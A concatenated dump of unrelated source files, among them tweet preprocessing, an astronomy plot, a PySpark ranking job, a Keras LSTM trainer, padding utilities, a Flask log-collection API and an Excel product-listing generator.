'', i, flags=re.MULTILINE) for i in a]\n a= [re.sub('[^A-Za-z0-9]+', '', i) for i in a]\n a= [i for i in a if len(i)>1 and i not in stop]\n return \" \".join(a)\n\n'''\n#this is for entries received from the json dump file\nentries=db.clean_tweets.find()\n\nfor e in entries:\n for s in e['screen_name']:\n \n processedTweet=processTweet(e['text'])\n urls=e['urls']\n \n #print s,processedTweet,urls\n \n feature_entry=db.user_tweets.find_one({'screen_name':s})\n print s,feature_entry\n if processedTweet is None:\n processedTweet=[]\n \n if urls is None:\n urls=[]\n \n if feature_entry is None:\n feature_entry={'screen_name':s,\n 'feature_list':[processedTweet],\n 'urls':[urls]\n }\n \n db.user_tweets.insert(feature_entry)\n \n else:\n 
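# this branch updates a screen_name that already has a document: extend the\n            # stored feature/url lists, then dedupe with list(set(...)) - note that the\n            # dedupe discards the original token order.\n            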
feature_list=feature_entry['feature_list']\n feature_list.extend([processedTweet])\n urls=feature_entry['urls']\n urls.extend([e['urls']])\n feature_list=list(set(feature_list))\n \n db.user_tweets.update(\n { 'screen_name':s },\n {\n '$set': {\n 'feature_list': feature_list,\n 'urls': urls \n }\n },upsert=False)\n \nfinal_entries=db.user_tweets.find()\nfor e in final_entries:\n tobeenteredfl=[] \n feature_list=e['feature_list']\n for fl in feature_list:\n flentry=fl.split()\n tobeenteredfl.extend(flentry)\n feature_entry={'screen_name':e['screen_name'],\n 'feature_list':tobeenteredfl,\n 'urls':list(set(e['urls']))\n }\n \n db.user_features.insert(feature_entry)\n'''\n#this is for the tweets pulled real time\n\nreal_user_tweets=db.real_user_tweets.find()\n\nfor rut in real_user_tweets:\n s=rut['user']['screen_name'] \n rct=db.real_clean_tweets.find_one({\"screen_name\":s})\n if rct is None:\n tweets=db.real_user_tweets.find({\"user.screen_name\" : s})\n feature_list=list(set([processTweet(t['text']) for t in tweets]))\n entry={\n 'screen_name':s,\n 'feature_list':feature_list\n }\n db.real_clean_tweets.insert(entry)","sub_path":"CleaningData/mergeUserFeatures.py","file_name":"mergeUserFeatures.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154721811","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport urllib\nSDSS_File = '/Users/compastro/jenkins/SDSS_4363+3_z+0.04.csv'\nSDSS_Data = np.genfromtxt(SDSS_File,skip_header=2, delimiter = ',',dtype=float,unpack=True)\nNII_6583 = SDSS_Data[28,:]\nHa_6562 = SDSS_Data[27,:]\nOIII_5006 = SDSS_Data[20,:]\nHb_4861 = SDSS_Data[18,:]\nOIII_4363 = SDSS_Data[14,:]\nOIII_Hb = np.log10(OIII_5006/Hb_4861)\nNII_Ha = np.log10(NII_6583/Ha_6562)\nplt.figure()\nplt.xlim(-1.5,0.5)\nplt.ylim(-1,1.5)\n#plt.scatter(NII_Ha,OIII_Hb,s=30,c='b')\nx=np.linspace(-1.5,0.3,50)\ny=((.61/(x-.47))+1.19)\nplt.plot(x,y,color='k')\nx3=np.linspace(-1,-0.2,50)\ny3=((.61/(x3-.05)+1.3))\nplt.plot(x3,y3,linestyle='--',color='red')\ncounter=0\nfor i in range(0,len(SDSS_Data[0,:])):\n if OIII_5006[i]/OIII_4363[i]<100.0:\n cool = plt.scatter(NII_Ha[i],OIII_Hb[i],color='r')\n counter=counter+1\n #print (\"madeit\")\n elif OIII_5006[i]/OIII_4363[i]>100.0 and OIII_5006[i]/OIII_4363[i]<1000.0:\n mid_temp = plt.scatter(NII_Ha[i],OIII_Hb[i],color='g')\n counter=counter+1\n #print(\"k\")\n elif OIII_5006[i]/OIII_4363[i]>1000.0:\n hot = plt.scatter(NII_Ha[i],OIII_Hb[i],color='k')\n counter=counter+1\n #print (\"r\")\n else:\n print (\"error\")\nprint(counter)\nplt.legend((cool, mid_temp, hot), ('Low Te','Mid Te','High Te'), scatterpoints = 1, loc = 'lower left', ncol = 3, fontsize =8)\nplt.ylabel(r\"log ([OIII] $\\lambda$5007/H$\\beta$)\")\nplt.xlabel(r\"log ([NII] $\\lambda$6584/H$\\alpha$)\")\nplt.title(\"BPT Diagram (AoN OIII_4363 > 3.0)\")\nplt.show()\n#subplots showing two plots of the same file next to each other, one BPT and one 5007/4363 (temp) vs. 
NII/Hb (ionization)\n#in notebook, write about trends shown in plots (low temp AGN, high temp mid ionization SF, etc.)\n","sub_path":"Metals_Sims/z_+_04_4363_3.py","file_name":"z_+_04_4363_3.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329191267","text":"books = {1:'a', 2:'b', 3:'c', 4:'d', 5:'d'}\nb_list = {}\nwhile True:\n name = input(\"회원의 이름을 입력하세요 : \")\n if name == 'q':\n break\n if name not in b_list.keys():\n b_list[name] = []\n print(b_list)\n while True:\n code = input(\"빌릴 책의 코드 : \")\n if code == 'q':\n break\n code = int(code)\n available = True\n for temp_name in b_list.keys():\n if books[code] in b_list[temp_name]:\n available = False\n break\n if available :\n b_list[name].append(books[code])\n else:\n print(\"이미 대출된 책입니다.\")\n if len(b_list[name]) >= 3:\n break\nprint(\"현재 대출자 목록\")\nprint(b_list)\n","sub_path":"2분기 프로젝트/CDTB_데이터_활용_경진대회/WebCrawling/ect.py","file_name":"ect.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649107238","text":"\n\ndef link_crawl_execute(session,downlaoder,seed_url,func):\n urls = []\n urls.extend(seed_url)\n\n item=urls.pop()\n while item:\n resp = downlaoder(item[0])\n newUrls = func(session, resp)\n urls.extend(newUrls)\n item=urls.pop()","sub_path":"requester/requester/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"343086623","text":"# coding=utf-8\n\"\"\"\nAdd the following to your *requirements.txt* file:\n\n* coverage\n* nose\n\n\"\"\"\n\n__docformat__ = 'restructuredtext en'\n\nfrom herring.herring_app import task\nfrom project_settings import Project, packages_required\nfrom local_shell import LocalShell\n\n\nrequired_packages = [\n 'coverage',\n 'nose'\n]\n\nif packages_required(required_packages):\n @task()\n def test():\n \"\"\" Run the unit tests \"\"\"\n with LocalShell() as local:\n local.run((\"nosetests -vv --where=%s\" % Project.tests_dir).split(' '))\n","sub_path":"herringlib/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239768400","text":"import pygame\n\ndef main():\n\n # Initialize pygame module\n pygame.init()\n logo = pygame.image.load(\"gear bronze rotate 1.0.png\")\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Engineworks\")\n\n # Create screen surface\n screen = pygame.display.set_mode((200, 200))\n\n # Set variable that controls the loop\n running = True\n\n # Main loop\n while running:\n # Event handling, gets all events from the event queue\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n\nif __name__ == \"__main__\":\n # Call main\n main()\n # https://www.pygame.org/wiki/tutorials\n\n # Current use tutorial: https://dr0id.bitbucket.io/legacy/pygame_tutorial00.html","sub_path":"public/pygame_example/pygame_main.py","file_name":"pygame_main.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386918251","text":"# Open file and set up vars\ninputTxt = open(\"Day 1/input.txt\", \"r\")\nyears = []\nimported = 0\n\n\n# Define function to check each number in array against all others\ndef doMath():\n for 
num1 in years:\n for num2 in years:\n if((num1 + num2) == 2020):\n product = num1 * num2\n print(\"2020 found, answer: \" + str(product))\n return\n\n# Import all years into array\nwhile imported == 0:\n line1 = inputTxt.readline()\n if(len(line1) > 0):\n years.append(int(line1))\n else:\n imported = 1\nprint(\"Years imported: \" + str(len(years)))\n\n# Call the math function\ndoMath()","sub_path":"Day 1/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72307093","text":"#! /usr/bin/env python3\nimport re, json\nfrom math import log2, log10, ceil\nfrom functools import partial\nfrom pyspark import SparkContext\n\ndef ceil5(x):\n return ceil(x/5)*5\n\ndef get_winner_loser(match):\n ms = match.split(',')\n # Put the loser in first position, winner in second\n return (ms[20], ms[10])\n\ndef initialize_voting(losses):\n return {'losses': losses,\n 'n_losses': len(losses),\n 'rating': 100}\n\ndef empty_ratings(d):\n d['rating'] = 0\n return d\n\ndef allocate_points(acc, nxt, i):\n k,v = nxt\n if i == 0:\n boost = 100 / (v['n_losses']+.01)\n else:\n boost = v['rating'] / (v['n_losses'] + .01)\n for loss in v['losses']:\n if loss not in acc.keys():\n acc[loss] = {'losses':[], 'n_losses': 0}\n opp_rating = acc.get(loss,{}).get('rating',0)\n acc[loss]['rating'] = opp_rating + boost\n return acc\n\ndef combine_scores(a, b):\n for k,v in b.items():\n try:\n a[k]['rating'] = a[k]['rating'] + b[k]['rating']\n except KeyError:\n a[k] = v\n return a\n\nif __name__ == \"__main__\":\n sc = SparkContext(appName=\"WikiMap\")\n entries = sc.textFile(\"wikipedia_edges.txt\")\n xs = entries.flatMap(lambda x:x.split('\\n'))\\\n .map(lambda x:x.split('\\t'))\\\n .groupByKey()\\\n .mapValues(initialize_voting)\n\n for i in range(7):\n if i > 0:\n xs = sc.parallelize(zs.items())\n acc = dict(xs.mapValues(empty_ratings).collect())\n agg_f = partial(allocate_points, i=i)\n zs = xs.aggregate(acc, agg_f, combine_scores)\n\n ratings = [(k,v['rating']) for k,v in zs.items()]\n for player, rating in sorted(ratings, key=lambda x: x[1], reverse=True)[:50]:\n print('{:<30}{}\\t{}'.format(player,\n round(log2(rating+1), 1),\n ceil5(rating)))\n","sub_path":"Code/Ch09/spark_wikipedia_mapreduce.py","file_name":"spark_wikipedia_mapreduce.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"401339398","text":"import keras\nfrom keras.models import Sequential\nfrom keras.models import model_from_json\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import LSTM\nfrom keras.layers import BatchNormalization\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import normalize\nfrom keras.optimizers import adam\nfrom keras.callbacks import EarlyStopping\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport pickle\nimport math\nfrom keras import backend as K\n\n# helper functions\ndef cleanMissingValues(dataset):\n print('cleaning dataset.')\n cleanedDataset = dataset\n shape = cleanedDataset.shape\n if shape[1] == 8:\n cleanedDataset[\"target\"] = 0\n cleanedDataset[\"missing\"] = False\n rowDroppedCount = 0\n for x in range(0, shape[0]):\n maxRowMissingValuesReached = False\n rowDropThreshold = len(cleanedDataset.iloc[x, 2]) / 10 * 9\n for y in range(2, 8):\n nanCount = 0\n 
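# The doMath() pair search in part1.py above rescans the whole list for every
# element (O(n^2)) and can also pair a number with itself when num1 is num2.
# A single-pass set lookup avoids both. This is a sketch under the same
# assumptions (years is a list of ints); find_pair_product is an illustrative
# name, not part of the original file:
def find_pair_product(years, target=2020):
    seen = set()
    for year in years:
        complement = target - year
        if complement in seen:
            # two distinct entries summing to target were found
            return year * complement
        seen.add(year)
    return None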
meanTotal = 0\n meanNum = 0\n maxColMissingValuesReached = False\n nanPresent = False\n for z in cleanedDataset.iloc[x, y]:\n if math.isnan(z):\n nanCount = nanCount + 1\n nanPresent = True\n elif maxRowMissingValuesReached == False:\n meanNum = meanNum + 1\n meanTotal = meanTotal + z\n if nanCount > rowDropThreshold:\n maxRowMissingValuesReached = True\n maxColMissingValuesReached = True\n elif nanPresent and maxRowMissingValuesReached == False:\n mean = meanTotal / meanNum\n for z in range(0, len(cleanedDataset.iloc[x, y])):\n if math.isnan(cleanedDataset.iloc[x, y][z]):\n cleanedDataset.iloc[x, y][z] = mean\n if maxRowMissingValuesReached:\n cleanedDataset.iloc[x, 9] = True\n cleanedDataset = cleanedDataset[cleanedDataset.missing == False]\n cleanedDataset = cleanedDataset.drop(\"missing\", axis=1)\n shape = cleanedDataset.shape\n return cleanedDataset\n\ndef reshapeDataSet(datasetTrain, datasetValidate):\n print('reshaping dataset.')\n expandedDatasetTrain = datasetTrain\n expandedDatasetValidate = datasetValidate\n shape = expandedDatasetTrain.shape\n cubeTrain = list()\n for x in range(0, shape[0]):\n square = list()\n for y in range(0, 6):\n column = list()\n for z in expandedDatasetTrain.iloc[x, y]:\n column.append(z)\n square.append(column)\n cubeTrain.append(square)\n cubeTrain = np.dstack(cubeTrain)\n shape = expandedDatasetValidate.shape\n cubeValidate = list()\n for x in range(0, shape[0]):\n square = list()\n for y in range(0, 6):\n column = list()\n for z in expandedDatasetValidate.iloc[x, y]:\n column.append(z)\n square.append(column)\n cubeValidate.append(square)\n cubeValidate = np.dstack(cubeValidate)\n for x in range(0, cubeTrain.shape[0]):\n sliceToNormaliseTrain = cubeTrain[x, :, :]\n sliceToNormaliseValidate = cubeValidate[x, :, :]\n sliceToNormaliseTrainMax = np.max(sliceToNormaliseTrain)\n sliceToNormaliseValidateMax = np.max(sliceToNormaliseValidate)\n sliceToNormaliseTrainMin = np.min(sliceToNormaliseTrain)\n sliceToNormaliseValidateMin = np.min(sliceToNormaliseValidate)\n maxToUse = 0\n minToUse = 0\n if sliceToNormaliseTrainMax > sliceToNormaliseValidateMax:\n maxToUse = sliceToNormaliseTrainMax\n else:\n maxToUse = sliceToNormaliseValidateMax\n if sliceToNormaliseTrainMin < sliceToNormaliseValidateMin:\n minToUse = sliceToNormaliseTrainMin\n else:\n minToUse = sliceToNormaliseValidateMin\n sliceToNormaliseTrain = (sliceToNormaliseTrain - minToUse) / (maxToUse - minToUse)\n sliceToNormaliseValidate = (sliceToNormaliseValidate - minToUse) / (maxToUse - minToUse)\n cubeTrain[x, :, :] = sliceToNormaliseTrain\n cubeValidate[x, :, :] = sliceToNormaliseValidate\n return cubeTrain, cubeValidate\n\n# reading in necessary train and test files\ntrainDataUrl = '../data/Train.p'\ntestDataUrl = '../data/Test.p'\ninfile = open(trainDataUrl,'rb')\ntrainData = pickle.load(infile)\ninfile.close()\ninfile = open(testDataUrl,'rb')\ntestData = pickle.load(infile)\ninfile.close()\n\n# # reading in pre-processed data\n# trainDataUrl = 'shapableTraining.pickle'\n# # testDataUrl = '../data/Test.p'\n# infile = open(trainDataUrl,'rb')\n# trainData = pickle.load(infile)\n# infile.close()\n# # infile = open(testDataUrl,'rb')\n# # testData = pickle.load(infile)\n# # infile.close()\n\nprint(\"dataset samples before cleaning:\")\nprint(trainData.shape[0])\n\n# cleaning missing input values\ntrainData = cleanMissingValues(trainData)\n\n# splitting X and Y values\nY_train = trainData.target\nX_train = trainData.drop('target', axis=1)\nX_train, X_validate, Y_train, Y_validate = 
train_test_split(X_train, Y_train, train_size=0.8, random_state=50)\nprint(\"training set samples:\")\nprint(X_train.shape[0])\nprint(\"validation set samples:\")\nprint(X_validate.shape[0])\n\n# reshaping data for the network\nX_train = X_train.iloc[:, 2:8]\nX_validate = X_validate.iloc[:, 2:8]\nX_train, X_validate = reshapeDataSet(X_train, X_validate)\n\n# saving shaped dataset\npickle_out = open(\"shapableTraining.pickle\",\"wb\")\npickle.dump(X_train, pickle_out)\npickle_out.close()\n\n# LSTM layers expect 3D input of shape (samples, timesteps, features)\nX_train_CNN = np.reshape(X_train, (X_train.shape[2], 121, 6))\nX_validate_CNN = np.reshape(X_validate, (X_validate.shape[2], 121, 6))\n\n# # load json and create model\n# json_file = open('model.json', 'r')\n# loaded_model_json = json_file.read()\n# json_file.close()\n# model = model_from_json(loaded_model_json)\n# # load weights into new model\n# model.load_weights(\"model.h5\")\n# print(\"Loaded model from disk\")\n\n# build LSTM model\nmodel = Sequential()\nmodel.add(LSTM(32, input_shape = (121, 6)))\nmodel.add(Dense(1, activation='linear'))\n\nes = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=50)\nopt = adam(lr=0.0001)\nmodel.compile(loss=\"mean_absolute_percentage_error\", optimizer=opt)\n\nprint('training model.')\nmodel.fit(x=X_train_CNN, y=Y_train, validation_data=(X_validate_CNN, Y_validate), epochs=1000, batch_size=16, callbacks=[es])\n\n# serialize model to JSON\nmodel_json = model.to_json()\nwith open(\"model.json\", \"w\") as json_file:\n    json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(\"model.h5\")\nprint(\"Saved model to disk\")\n\n# making predictions\nprint('making predictions.')\npreds = model.predict(X_validate_CNN)\n\ndiff = preds.flatten() - Y_validate\npercentDiff = (diff / Y_validate) * 100\nabsPercentDiff = np.abs(percentDiff)\n\nmean = np.mean(absPercentDiff)\nstd = np.std(absPercentDiff)\n\nprint('mean: {:.2f}%, std: {:.2f}%'.format(mean, std))","sub_path":"code/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"425803953","text":"#coding: utf-8\nimport numpy as np\nimport os, re, sys, random, copy, time, json\nfrom core.vocabulary.base import PAD_ID\n\nclass DatasetBase(object):\n  @property\n  def size(self):\n    train_size = self.train.size if hasattr(self.train, 'size') else 0\n    valid_size = self.valid.size if hasattr(self.valid, 'size') else 0\n    test_size = self.test.size if hasattr(self.test, 'size') else 0\n    return train_size, valid_size, test_size\n\n# Functions for padding.\n\ndef fill_empty_brackets(sequence, max_len):\n  \"\"\"\n  - sequence: A 1D list of list.\n  \"\"\"\n  return sequence + [[] for _ in range(max_len - len(sequence))]\n\ndef fill_zero(sequence, length): # zero-pad when the longest sequence is too short\n  '''\n  Make the length of a sequence at least 'length' by truncating or filling with 0.\n  Args:\n    sequence: A 1D list of integer.\n    length: an integer.\n  '''\n  if len(sequence) < length:\n    return sequence + [0 for _ in range(length - len(sequence))]\n  else:\n    return sequence\n\n\ndef define_length(batch, minlen=None, maxlen=None):\n  if minlen is None:\n    minlen = 0\n\n  if maxlen:\n    return max(maxlen, minlen) \n  else:\n    return max([len(b) for b in batch] + [minlen])\n\ndef padding_2d(batch, minlen=None, maxlen=None, pad=PAD_ID, pad_type='post'):\n  '''\n  Args:\n   batch: a 2D list. 
\n maxlen: an integer.\n Return:\n A 2D tensor of which shape is [batch_size, max_num_word].\n '''\n if type(maxlen) == list:\n maxlen = maxlen[0]\n if type(minlen) == list:\n minlen = minlen[0]\n\n length_of_this_dim = define_length(batch, minlen, maxlen)\n return np.array([fill_zero(l[:length_of_this_dim], length_of_this_dim) for l in batch])\n\ndef padding(batch, minlen, maxlen, pad=PAD_ID):\n '''\n Args:\n - batch: A list of tensors with different shapes.\n - minlen, maxlen: A list of integers or None. Each i-th element specifies the minimum (or maximum) size of the tensor in the rank i+1.\n minlen[i] is considered as 0 if it is None, and maxlen[i] is automatically set to be equal to the maximum size of 'batch', the input tensor.\n \n e.g. \n [[1], [2, 3], [4, 5, 6]] with minlen=[None], maxlen=[None] should be\n [[1, 0, 0], [2, 3, 0], [4, 5, 6]]\n '''\n assert len(minlen) == len(maxlen)\n rank = len(minlen) + 1\n padded_batch = []\n\n length_of_this_dim = define_length(batch, minlen[0], maxlen[0])\n if rank == 2:\n return padding_2d(batch, minlen=minlen[0], maxlen=maxlen[0], pad=pad)\n\n for l in batch:\n l = fill_empty_brackets(l[:length_of_this_dim], length_of_this_dim)\n if rank == 3:\n l = padding_2d(l, minlen=minlen[1:], maxlen=maxlen[1:], pad=pad)\n else:\n l = padding(l, minlen=minlen[1:], maxlen=maxlen[1:], pad=pad)\n\n padded_batch.append(l)\n largest_shapes = [max(n_dims) for n_dims in zip(*[tensor.shape for tensor in padded_batch])]\n target_tensor = np.zeros([len(batch)] + largest_shapes)\n\n for i, tensor in enumerate(padded_batch):\n pad_lengths = [x - y for x, y in zip(largest_shapes, tensor.shape)]\n pad_shape = [(0, l) for l in pad_lengths] \n padded_batch[i] = np.pad(tensor, pad_shape, 'constant')\n return np.array(padded_batch)\n","sub_path":"core/dataset/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"221356288","text":"#!/usr/bin/env python\nimport argparse\nimport json\nimport logging\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nfrom datetime import datetime\nfrom flask import Flask, Response\nfrom flask_cors import CORS\nfrom flask_restful import Api, Resource, fields, marshal, abort\n\n\napp = Flask(__name__)\nCORS(app)\napi = Api(app, prefix='/logs/v1.0')\n\nARCHIVE_BASE_DIR = tempfile.gettempdir()\nCONFIG_FILE = '/etc/log-collector-api.json'\n\nLOG_FORMAT = '%(asctime)s %(levelname) -8s %(message)s'\n\nconfig = None\nroot_logger = None\n\n\nclass ServiceConfig(object):\n \"\"\"Configuration for the service.\"\"\"\n\n def __init__(self, file_path):\n self._file_path = file_path\n\n self._bind_address = None\n self._bind_port = None\n self._debug = False\n\n self._hosts = []\n\n self.load()\n\n def load(self):\n \"\"\"Load the configuration.\"\"\"\n with open(self.file_path, 'rb') as fp:\n config = json.load(fp)\n\n self._bind_address = config['server']['bind']\n self._bind_port = config['server']['port']\n self._debug = config['server']['debug']\n\n self._hosts = config['hosts']\n\n @property\n def file_path(self):\n \"\"\"Configuration file path.\"\"\"\n return self._file_path\n\n @property\n def bind_address(self):\n \"\"\"Address to bind the service to.\"\"\"\n return self._bind_address\n\n @property\n def bind_port(self):\n \"\"\"Port to listen on.\"\"\"\n return self._bind_port\n\n @property\n def debug(self):\n \"\"\"Debug flag.\"\"\"\n return self._debug\n\n @property\n def hosts(self):\n 
\"\"\"List of host dicts.\"\"\"\n return self._hosts\n\n\ndef setup_logging():\n \"\"\"Configuration the logging module and returns the root logger.\"\"\"\n formatter = logging.Formatter(LOG_FORMAT)\n\n console = logging.StreamHandler()\n console.setFormatter(formatter)\n console.setLevel(logging.INFO)\n\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n logger.addHandler(console)\n\n return logger\n\n\ndef get_cmdline_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', metavar='FILE', default=CONFIG_FILE,\n help='the configuration file (default: %(default)s')\n return parser.parse_args()\n\n\ndef copy_remote_dir(host, src, dest):\n copy_remote_file(host, src, dest, True)\n\n\ndef copy_remote_file(host, src, dest, recursive=False):\n \"\"\"Copies *src* from *host* to *dest*. Copies recurively if *recursive* is\n True.\n \"\"\"\n dest_filename = '%s-%s' % (host, os.path.basename(src))\n command = [\n 'scp',\n '-o',\n 'BatchMode=yes',\n '-o',\n 'StrictHostKeyChecking=no',\n '%s:%s' % (host, src),\n os.path.join(dest, dest_filename)\n ]\n\n if recursive:\n command.insert(1, '-r')\n\n with open(os.devnull, 'w') as fnull:\n subprocess.check_call(command, stdout=fnull, stderr=subprocess.STDOUT)\n\n\ndef save_command_output(host, remote_command, filename, destdir):\n \"\"\"Runs *remote_command* on *host* and saves the stdout and stderr to\n *filename* in *destdir*.\n \"\"\"\n command = [\n 'ssh',\n '-o',\n 'BatchMode=yes',\n '-o',\n 'StrictHostKeyChecking=no',\n host,\n remote_command\n ]\n p = subprocess.Popen(command, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n out, err = p.communicate()\n\n dest_filename = '%s-%s' % (host, filename)\n filepath = os.path.join(destdir, dest_filename)\n with open(filepath, 'wb') as fp:\n fp.write(out)\n\n\ndef build_archive(filepath):\n \"\"\"Builds the support log archive based on the files and commands listed\n in the configuration file.\n \"\"\"\n # Get a temporary directory in which the files will be accumulated.\n tempdir = tempfile.mkdtemp()\n root_logger.info(\"Will accumulate files in %s\", tempdir)\n\n for hostname in config.hosts:\n entries = config.hosts[hostname]\n for entry in entries:\n # Save a command's output\n if entry['type'] == 'execute':\n root_logger.info(\"Saving output of %s\", entry['command'])\n try:\n save_command_output(hostname, entry['command'],\n entry['filename'], tempdir)\n except (OSError, IOError, subprocess.CalledProcessError) as e:\n root_logger.warning(\"Failed to execute: %s\", e)\n elif entry['type'] == 'file':\n root_logger.info(\"Copying %s from %s\", entry['filename'],\n hostname)\n try:\n copy_remote_file(hostname, entry['filename'], tempdir)\n except (OSError, IOError, subprocess.CalledProcessError) as e:\n root_logger.warning(\"Failed to copy %s: %s\",\n entry['filename'], e)\n elif entry['type'] == 'directory':\n root_logger.info(\"Copying %s from %s\", entry['path'], hostname)\n try:\n copy_remote_dir(hostname, entry['path'], tempdir)\n except (OSError, IOError, subprocess.CalledProcessError) as e:\n root_logger.warning(\"Failed to copy %s: %s\",\n entry['path'], e)\n else:\n root_logger.warning(\"Unknown entry type: %s\", entry['type'])\n\n root_logger.info(\"Compressing %s to %s\", tempdir, filepath)\n command = ['tar', 'Jcfp', filepath, tempdir]\n with open(os.devnull, 'w') as fnull:\n subprocess.check_call(command, stdout=fnull, stderr=subprocess.STDOUT)\n\n root_logger.info('Cleaning up temporary directory')\n shutil.rmtree(tempdir)\n\n\ndef 
get_archive(filepath, chunk=1024):\n    \"\"\"Generator to get the archive data in chunks. Default chunk: 1KB\"\"\"\n    with open(filepath, 'rb') as fp:\n        while True:\n            data = fp.read(chunk)\n            if not data:\n                break\n            yield data\n\n\nclass Collector(Resource):\n\n    ARCHIVE_NAME_FORMAT = 'SUPPORT_LOGS_{timestamp}.tar.xz'\n    TIMESTAMP_FORMAT = '%Y%m%dT%H%M%S%Z'\n\n    FIELDS = {\n        \"filesize\": fields.Float,\n        \"filename\": fields.String\n    }\n\n    def get(self):\n        \"\"\"Collect the logs and then return the file size of the log archive\n        in MB.\n        \"\"\"\n        now = datetime.now()\n        timestamp = now.strftime(self.TIMESTAMP_FORMAT)\n        filename = self.ARCHIVE_NAME_FORMAT.format(timestamp=timestamp)\n        filepath = os.path.join(ARCHIVE_BASE_DIR, filename)\n\n        try:\n            build_archive(filepath)\n        except Exception as e:\n            root_logger.error(\"Failed to build support archive: %s\", e)\n            return {'error': 'Failed to build support archive'}, 500\n\n        stat = os.stat(filepath)\n        filesize = stat.st_size / float(1024 * 1024)\n\n        data = {'filesize': filesize, 'filename': filename}\n        return marshal(data, self.FIELDS)\n\n\nclass Downloader(Resource):\n\n    # noinspection PyMethodMayBeStatic\n    def get(self, filename):\n        \"\"\"Downloads the log archive.\"\"\"\n        filepath = os.path.join(ARCHIVE_BASE_DIR, filename)\n        if not os.path.exists(filepath):\n            root_logger.error(\"%s does not exist\", filepath)\n            abort(404)\n\n        stat = os.stat(filepath)\n        filesize = stat.st_size\n\n        headers = {\n            'Content-Disposition': 'filename=%s' % filename,\n            'Content-Length': filesize\n        }\n\n        return Response(get_archive(filepath), mimetype='application/x-gtar',\n                        headers=headers)\n\napi.add_resource(Collector, '/collect')\napi.add_resource(Downloader, '/download/<filename>')\n\n\ndef main():\n    global root_logger, config\n\n    root_logger = setup_logging()\n    args = get_cmdline_args()\n    try:\n        config = ServiceConfig(args.config)\n    except IOError as exc:\n        root_logger.error(\"Failed to load configuration: %s\", exc)\n        sys.exit(1)\n\n    app.run(host=config.bind_address, port=config.bind_port,\n            debug=config.debug)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"log-collector-api.py","file_name":"log-collector-api.py","file_ext":"py","file_size_in_byte":8188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176180852","text":"from app.utility import work_with_excel\nfrom app.utility.work_with_excel import (\n    get_static_data,\n    get_column_names,\n)\nimport re, os\nfrom datetime import datetime\n\ntimestamp = datetime.now().strftime(\"%d%b%y_%H-%M\")\n\n\ndef recording(\n    all_categories,\n    ovs_folder,\n    ovs_static,\n    subconstructor_overstock,\n    frame_amazon,\n    pagename_amazon,\n    static_amazon,\n    subconstructor_amazon,\n    decoration_data,\n):\n    print(\"-------category generating data-------\")\n    amazon_output_data = []\n    no_image = []\n    successfull_items = 0\n    amazon_image_cells = []\n    amazon_colnames = get_column_names(frame_amazon, pagename_amazon)\n    amazon_sta_data = get_static_data(static_amazon)\n    overstock_sta_data = get_static_data(ovs_static)\n    for colname in amazon_colnames:\n        match = re.search(r\"_image_url\", colname)\n        if match:\n            amazon_image_cells.append(colname)\n\n    for one_category in all_categories:\n        items_qty = len(one_category)\n        overstock_output_data = []\n        previous_pagename = \"\"\n        count = 0\n        for item in one_category:\n            count += 1\n            pagename = item.pagename_ovs\n            filename = item.filename_ovs\n\n            if previous_pagename and previous_pagename != pagename:\n                suffix = \"\".join(\n                    
previous_filename.rsplit(\"/\", 1)[-1]\n .split(\"-\")[-1]\n .split(\".\")[0]\n .split(\" \")\n )\n out_filename = f\"{ovs_folder}/{suffix}.xlsx\"\n work_with_excel.printing(\n overstock_output_data,\n previous_filename,\n out_filename,\n previous_pagename,\n )\n overstock_output_data = []\n overstock_colnames = get_column_names(filename, pagename)\n else:\n if count == 1:\n overstock_colnames = get_column_names(filename, pagename)\n overstock_main_image_cells = []\n overstock_option_image_cells = []\n for colname in overstock_colnames:\n match_main = re.search(r\"Product Image\", colname)\n match_option = re.search(r\"Option Image\", colname)\n if match_main:\n overstock_main_image_cells.append(colname)\n elif match_option:\n overstock_option_image_cells.append(colname)\n\n \"\"\" checking if item has images:\n If item is local_manucactured and it doesn't have all color options images - item will be skipped and showed in error report. Black gold color - is optional\n Non-local-manufactured items will be moved further and only available color option images will be listed\"\"\"\n item_images = item.images\n unavailable_image_variations = []\n available_image_variations = []\n local = item.local_manufacturing\n for k, v in 